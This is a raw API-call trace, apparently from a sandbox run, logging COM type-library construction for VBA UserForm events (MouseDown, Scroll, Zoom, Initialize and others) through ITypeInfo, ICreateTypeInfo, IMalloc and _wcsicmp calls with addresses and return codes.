_wcsicmp (_String1="MouseDown", _String2="Parent") returned -3 [0041.926] _wcsicmp (_String1="MouseDown", _String2="Delete") returned 9 [0041.926] _wcsicmp (_String1="MouseDown", _String2="Index") returned 4 [0041.926] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.926] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xa, pFuncDesc=0x6c1eab8) returned 0x0 [0041.926] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xa, rgszNames=0x6bc4250*="MouseDown", cNames=0x5) returned 0x0 [0041.926] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-605, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.926] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-605, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000) returned 0x0 [0041.926] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xa, dwHelpContext=0x1e852a) returned 0x0 [0041.926] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.926] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xb, ppFuncDesc=0x185de8, pDummy=0x7cd019101f1 | out: ppFuncDesc=0x185de8, pDummy=0x7cd019101f1) returned 0x0 [0041.926] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x6bc4250 [0041.926] IMalloc:GetSize (This=0x7feffc15380, pv=0x6bc4250) returned 0x28 [0041.926] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-606, rgBstrNames=0x6bc4250, cMaxNames=0x5, pcNames=0x185f0c | out: rgBstrNames=0x6bc4250*="MouseMove", pcNames=0x185f0c*=0x5) returned 0x0 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Initialize") returned 4 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Resize") returned -5 [0041.926] _wcsicmp (_String1="MouseMove", _String2="QueryClose") returned -4 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Activate") returned 12 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Deactivate") returned 9 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Terminate") returned -7 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Object") returned -2 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Name") returned -1 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Parent") returned -3 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Delete") returned 9 [0041.926] _wcsicmp (_String1="MouseMove", _String2="Index") returned 4 [0041.926] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.926] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xb, pFuncDesc=0x6c1eab8) returned 0x0 [0041.926] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xb, rgszNames=0x6bc4250*="MouseMove", cNames=0x5) returned 0x0 [0041.926] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-606, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.926] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-606, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000) returned 0x0 [0041.926] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xb, dwHelpContext=0x1e8534) returned 0x0 [0041.926] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.926] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xc, ppFuncDesc=0x185de8, pDummy=0x7ce019101f1 | out: ppFuncDesc=0x185de8, pDummy=0x7ce019101f1) returned 0x0 [0041.926] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x6bc4250 [0041.926] IMalloc:GetSize (This=0x7feffc15380, pv=0x6bc4250) returned 0x28 [0041.926] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-607, rgBstrNames=0x6bc4250, cMaxNames=0x5, pcNames=0x185f0c | out: rgBstrNames=0x6bc4250*="MouseUp", pcNames=0x185f0c*=0x5) returned 0x0 [0041.926] _wcsicmp (_String1="MouseUp", _String2="Initialize") returned 4 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Resize") returned -5 [0041.927] _wcsicmp (_String1="MouseUp", _String2="QueryClose") returned -4 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Activate") returned 12 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Deactivate") returned 9 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Terminate") returned -7 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Object") returned -2 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Name") returned -1 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Parent") returned -3 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Delete") returned 9 [0041.927] _wcsicmp (_String1="MouseUp", _String2="Index") returned 4 [0041.927] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.927] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xc, pFuncDesc=0x6c1eab8) returned 0x0 [0041.927] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xc, rgszNames=0x6bc4250*="MouseUp", cNames=0x5) returned 0x0 [0041.927] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-607, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.927] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-607, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x500000000) returned 0x0 [0041.927] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xc, dwHelpContext=0x1e853e) returned 0x0 [0041.927] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.927] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xd, ppFuncDesc=0x185de8, pDummy=0x7cf019101f1 | out: ppFuncDesc=0x185de8, pDummy=0x7cf019101f1) returned 0x0 [0041.927] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34d10 [0041.927] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x10 [0041.927] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=771, rgBstrNames=0x6c34d10, cMaxNames=0x2, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="RemoveControl", pcNames=0x185f0c*=0x2) returned 0x0 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Initialize") returned 9 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Resize") returned -6 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="QueryClose") returned 1 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Activate") returned 17 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Deactivate") returned 14 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Terminate") returned -2 [0041.927] _wcsicmp (_String1="RemoveControl", _String2="Object") returned 3 [0041.928] _wcsicmp (_String1="RemoveControl", _String2="Name") returned 4 [0041.928] _wcsicmp (_String1="RemoveControl", _String2="Parent") returned 2 [0041.928] _wcsicmp (_String1="RemoveControl", _String2="Delete") returned 14 [0041.928] _wcsicmp (_String1="RemoveControl", _String2="Index") returned 9 [0041.928] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6bef0) returned 0x0 [0041.928] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.928] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.928] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.928] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6bef0) returned 0x0 [0041.928] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.928] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.928] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.928] IUnknown:AddRef (This=0x6c6bef0) returned 0x2 [0041.928] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.928] IUnknown:Release (This=0x6c6bef0) returned 0x1 [0041.928] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6bef0, phRefType=0x185c30*=0x186928) returned 0x0 [0041.928] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.928] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.928] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xd, pFuncDesc=0x6c1eab8) returned 0x0 [0041.928] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xd, rgszNames=0x6c34d10*="RemoveControl", cNames=0x2) returned 0x0 [0041.928] ITypeInfo:GetMops (in: This=0x6c6be98, memid=771, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.928] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=771, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000) returned 0x0 [0041.928] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xd, dwHelpContext=0x1e8548) returned 0x0 [0041.928] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.928] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xe, ppFuncDesc=0x185de8, pDummy=0xce303d205ea | out: ppFuncDesc=0x185de8, pDummy=0xce303d205ea) returned 0x0 [0041.928] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x68803b0 [0041.928] IMalloc:GetSize (This=0x7feffc15380, pv=0x68803b0) returned 0x38 [0041.928] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=772, rgBstrNames=0x68803b0, cMaxNames=0x7, pcNames=0x185f0c | out: rgBstrNames=0x68803b0*="Scroll", pcNames=0x185f0c*=0x7) returned 0x0 [0041.928] _wcsicmp (_String1="Scroll", _String2="Initialize") returned 10 [0041.928] _wcsicmp (_String1="Scroll", _String2="Resize") returned 1 [0041.928] _wcsicmp (_String1="Scroll", _String2="QueryClose") returned 2 [0041.928] _wcsicmp (_String1="Scroll", _String2="Activate") returned 18 [0041.928] _wcsicmp (_String1="Scroll", _String2="Deactivate") returned 15 [0041.928] _wcsicmp (_String1="Scroll", _String2="Terminate") returned -1 [0041.929] _wcsicmp (_String1="Scroll", _String2="Object") returned 4 [0041.929] _wcsicmp (_String1="Scroll", _String2="Name") returned 5 [0041.929] _wcsicmp (_String1="Scroll", _String2="Parent") returned 3 [0041.929] _wcsicmp (_String1="Scroll", _String2="Delete") returned 15 [0041.929] _wcsicmp (_String1="Scroll", _String2="Index") returned 10 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0xb00, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c628, ppTypeAttr=0x185f48, pDummy=0xb00 | out: ppTypeAttr=0x185f48, pDummy=0xb00) returned 0x0 [0041.929] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c628) returned 0x0 [0041.929] IUnknown:Release (This=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0xb00, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c628, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.929] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c628) returned 0x0 [0041.929] IUnknown:Release (This=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x800, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c680) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c680, ppTypeAttr=0x185f48, pDummy=0x800 | out: ppTypeAttr=0x185f48, pDummy=0x800) returned 0x0 [0041.929] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c680) returned 0x0 [0041.929] IUnknown:Release (This=0x6c6c680) returned 0x0 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x800, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c680) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c680, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.929] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c680) returned 0x0 [0041.929] IUnknown:Release (This=0x6c6c680) returned 0x0 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0xb00, ppTInfo=0x185cc8 | out: ppTInfo=0x185cc8*=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c628, ppTypeAttr=0x185d08, pDummy=0x185cb0 | out: ppTypeAttr=0x185d08, pDummy=0x185cb0*=0x185d30) returned 0x0 [0041.929] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c628) returned 0x0 [0041.929] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.929] IUnknown:AddRef (This=0x6c6c628) returned 0x2 [0041.929] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.929] IUnknown:Release (This=0x6c6c628) returned 0x1 [0041.929] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c628, phRefType=0x185cd0*=0x0) returned 0x0 [0041.929] IUnknown:Release (This=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0xb00, ppTInfo=0x185cc8 | out: ppTInfo=0x185cc8*=0x6c6c628) returned 0x0 [0041.929] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c628, ppTypeAttr=0x185d08, pDummy=0x185cb0 | out: ppTypeAttr=0x185d08, pDummy=0x185cb0*=0x185d30) returned 0x0 [0041.930] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c628) returned 0x0 [0041.930] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.930] IUnknown:AddRef (This=0x6c6c628) returned 0x2 [0041.930] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.930] IUnknown:Release (This=0x6c6c628) returned 0x1 [0041.930] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c628, phRefType=0x185cd0*=0x61) returned 0x0 [0041.930] IUnknown:Release (This=0x6c6c628) returned 0x0 [0041.930] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x800, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c680) returned 0x0 [0041.930] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c680, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.930] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c680) returned 0x0 [0041.930] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.930] IUnknown:AddRef (This=0x6c6c680) returned 0x2 [0041.930] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.930] IUnknown:Release (This=0x6c6c680) returned 0x1 [0041.930] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c680, phRefType=0x185c30*=0x0) returned 0x0 [0041.930] IUnknown:Release (This=0x6c6c680) returned 0x0 [0041.930] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x800, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c680) returned 0x0 [0041.930] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c680, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.930] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c680) returned 0x0 [0041.930] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.930] IUnknown:AddRef (This=0x6c6c680) returned 0x2 [0041.930] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.930] IUnknown:Release (This=0x6c6c680) returned 0x1 [0041.930] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c680, phRefType=0x185c30*=0x6d) returned 0x0 [0041.930] IUnknown:Release (This=0x6c6c680) returned 0x0 [0041.930] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.930] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xe, pFuncDesc=0x3ea0b88) returned 0x0 [0041.930] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xe, rgszNames=0x68803b0*="Scroll", cNames=0x7) returned 0x0 [0041.930] ITypeInfo:GetMops (in: This=0x6c6be98, memid=772, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.930] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=772, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x700000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x700000000) returned 0x0 [0041.931] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xe, dwHelpContext=0x1e8552) returned 0x0 [0041.931] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.931] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xf, ppFuncDesc=0x185de8, pDummy=0xff357d0f12020212 | out: ppFuncDesc=0x185de8, pDummy=0xff357d0f12020212) returned 0x0 [0041.931] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34d10 [0041.931] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x10 [0041.931] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=773, rgBstrNames=0x6c34d10, cMaxNames=0x2, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="Zoom", pcNames=0x185f0c*=0x2) returned 0x0 [0041.931] _wcsicmp (_String1="Zoom", _String2="Initialize") returned 17 [0041.931] _wcsicmp (_String1="Zoom", _String2="Resize") returned 8 [0041.931] _wcsicmp (_String1="Zoom", _String2="QueryClose") returned 9 [0041.931] _wcsicmp (_String1="Zoom", _String2="Activate") returned 25 [0041.931] _wcsicmp (_String1="Zoom", _String2="Deactivate") returned 22 [0041.931] _wcsicmp (_String1="Zoom", _String2="Terminate") returned 6 [0041.931] _wcsicmp (_String1="Zoom", _String2="Object") returned 11 [0041.931] _wcsicmp (_String1="Zoom", _String2="Name") returned 12 [0041.931] _wcsicmp (_String1="Zoom", _String2="Parent") returned 10 [0041.931] _wcsicmp (_String1="Zoom", _String2="Delete") returned 22 [0041.931] _wcsicmp (_String1="Zoom", _String2="Index") returned 17 [0041.931] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.931] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0xf, pFuncDesc=0x6c1eab8) returned 0x0 [0041.931] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0xf, rgszNames=0x6c34d10*="Zoom", cNames=0x2) returned 0x0 [0041.931] ITypeInfo:GetMops (in: This=0x6c6be98, memid=773, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.931] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=773, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000) returned 0x0 [0041.931] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0xf, dwHelpContext=0x1e8570) returned 0x0 [0041.931] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.931] ITypeInfo:GetRefTypeOfImplType (in: This=0x6c6be98, index=0x0, pRefType=0x185d88 | out: pRefType=0x185d88*=0xd) returned 0x0 [0041.931] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0xd, ppTInfo=0x185d98 | out: ppTInfo=0x185d98*=0x6bbd1c8) returned 0x0 [0041.931] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.931] IUnknown:AddRef (This=0x6bbd1c8) returned 0x5 [0041.932] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.932] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0041.932] ITypeInfo:GetImplTypeFlags (in: This=0x6c6be98, index=0x0, pImplTypeFlags=0x185d8c | out: pImplTypeFlags=0x185d8c*=0) returned 0x0 [0041.932] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6bbd1c8, phRefType=0x185d88*=0xd) returned 0x0 [0041.932] ICreateTypeInfo:AddImplType (This=0x6ccf070, index=0x0, hreftype=0x79) returned 0x0 [0041.937] IUnknown:Release (This=0x6bbd1c8) returned 0x3 [0041.937] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.937] _wcsicmp (_String1="Initialize", _String2="Object") returned -6 [0041.937] _wcsicmp (_String1="Initialize", _String2="Name") returned -5 [0041.937] _wcsicmp (_String1="Initialize", _String2="Parent") returned -7 [0041.937] _wcsicmp (_String1="Initialize", _String2="Delete") returned 5 [0041.937] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.937] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x10, pFuncDesc=0x4de8440) returned 0x0 [0041.937] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x10, rgszNames=0x6cbe540*="Initialize", cNames=0x1) returned 0x0 [0041.937] _wcsicmp (_String1="Resize", _String2="Object") returned 3 [0041.937] _wcsicmp (_String1="Resize", _String2="Name") returned 4 [0041.937] _wcsicmp (_String1="Resize", _String2="Parent") returned 2 [0041.937] _wcsicmp (_String1="Resize", _String2="Delete") returned 14 [0041.937] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.937] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x11, pFuncDesc=0x4de8440) returned 0x0 [0041.937] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x11, rgszNames=0x6cbe540*="Resize", cNames=0x1) returned 0x0 [0041.937] _wcsicmp (_String1="QueryClose", _String2="Object") returned 2 [0041.937] _wcsicmp (_String1="QueryClose", _String2="Name") returned 3 [0041.937] _wcsicmp (_String1="QueryClose", _String2="Parent") returned 1 [0041.937] _wcsicmp (_String1="QueryClose", _String2="Delete") returned 13 [0041.937] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.937] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x12, pFuncDesc=0x4de8440) returned 0x0 [0041.937] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x12, rgszNames=0x6c355f0*="QueryClose", cNames=0x3) returned 0x0 [0041.937] _wcsicmp (_String1="Activate", _String2="Object") returned -14 [0041.937] _wcsicmp (_String1="Activate", _String2="Name") returned -13 [0041.937] _wcsicmp (_String1="Activate", _String2="Parent") returned -15 [0041.937] _wcsicmp (_String1="Activate", _String2="Delete") returned -3 [0041.937] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.937] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x13, pFuncDesc=0x4de8440) returned 0x0 [0041.937] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x13, rgszNames=0x6cbe540*="Activate", cNames=0x1) returned 0x0 [0041.938] _wcsicmp (_String1="Deactivate", _String2="Object") returned -11 [0041.938] _wcsicmp (_String1="Deactivate", _String2="Name") returned -10 [0041.938] _wcsicmp (_String1="Deactivate", _String2="Parent") returned -12 [0041.938] _wcsicmp (_String1="Deactivate", _String2="Delete") returned -11 [0041.938] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.938] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x14, pFuncDesc=0x4de8440) returned 0x0 [0041.938] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x14, rgszNames=0x6cbe540*="Deactivate", cNames=0x1) returned 0x0 [0041.938] _wcsicmp (_String1="Terminate", _String2="Object") returned 5 [0041.938] _wcsicmp (_String1="Terminate", _String2="Name") returned 6 [0041.938] _wcsicmp (_String1="Terminate", _String2="Parent") returned 4 [0041.938] 